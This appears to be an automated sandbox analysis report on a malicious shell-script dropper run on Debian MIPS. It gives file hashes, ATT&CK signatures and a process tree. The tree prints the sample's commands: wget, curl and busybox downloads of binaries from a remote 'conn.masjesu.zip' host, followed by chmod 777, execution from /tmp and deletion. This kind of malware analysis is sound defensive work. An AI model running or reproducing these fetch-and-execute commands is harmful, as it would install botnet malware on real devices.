Analysis
-
max time kernel
150s -
max time network
152s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/11/2024, 02:56
Static task
static1
Behavioral task
behavioral1
Sample
bb60118326ffb4a0fae363e8a06670643af921e085b7446ab574219a647d09f0.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
bb60118326ffb4a0fae363e8a06670643af921e085b7446ab574219a647d09f0.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bb60118326ffb4a0fae363e8a06670643af921e085b7446ab574219a647d09f0.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bb60118326ffb4a0fae363e8a06670643af921e085b7446ab574219a647d09f0.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
bb60118326ffb4a0fae363e8a06670643af921e085b7446ab574219a647d09f0.sh
-
Size
10KB
-
MD5
4d3bce6e63e7c5062d430bdd3db51803
-
SHA1
2d3713bb55e4b4054a8ea71bc1b85cd4c6d4a209
-
SHA256
bb60118326ffb4a0fae363e8a06670643af921e085b7446ab574219a647d09f0
-
SHA512
75685841609c7ddcf89cfb067c3f1040185e2c05255ffd3e4f6ba9b883dcdb8104855c19ef5ab26f75cba56af1bb5eced0393bdb4488bbfeb8112d9518cff29f
-
SSDEEP
192:ijfWh9fkN8J554EnaaBkW4EnaaHwjfWh9fn:ijfWhRkN8J554EnaaBkW4EnaaHwjfWhp
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 812 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/echR7baySM3MdHlrFhMfz1QZBE4hDj2gbH 813 echR7baySM3MdHlrFhMfz1QZBE4hDj2gbH -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 815 wget 816 curl 712 wget 729 curl 811 busybox -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/echR7baySM3MdHlrFhMfz1QZBE4hDj2gbH curl
Processes
-
/tmp/bb60118326ffb4a0fae363e8a06670643af921e085b7446ab574219a647d09f0.sh/tmp/bb60118326ffb4a0fae363e8a06670643af921e085b7446ab574219a647d09f0.sh1⤵PID:701
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/echR7baySM3MdHlrFhMfz1QZBE4hDj2gbH2⤵
- System Network Configuration Discovery
PID:712
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/echR7baySM3MdHlrFhMfz1QZBE4hDj2gbH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/echR7baySM3MdHlrFhMfz1QZBE4hDj2gbH2⤵
- System Network Configuration Discovery
PID:811
-
-
/bin/chmodchmod 777 echR7baySM3MdHlrFhMfz1QZBE4hDj2gbH2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/echR7baySM3MdHlrFhMfz1QZBE4hDj2gbH./echR7baySM3MdHlrFhMfz1QZBE4hDj2gbH2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm echR7baySM3MdHlrFhMfz1QZBE4hDj2gbH2⤵PID:814
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PHt8ev9v5d3A2CLoiKX1ynO76Sv0lRGbcb2⤵
- System Network Configuration Discovery
PID:815
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PHt8ev9v5d3A2CLoiKX1ynO76Sv0lRGbcb2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:816
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97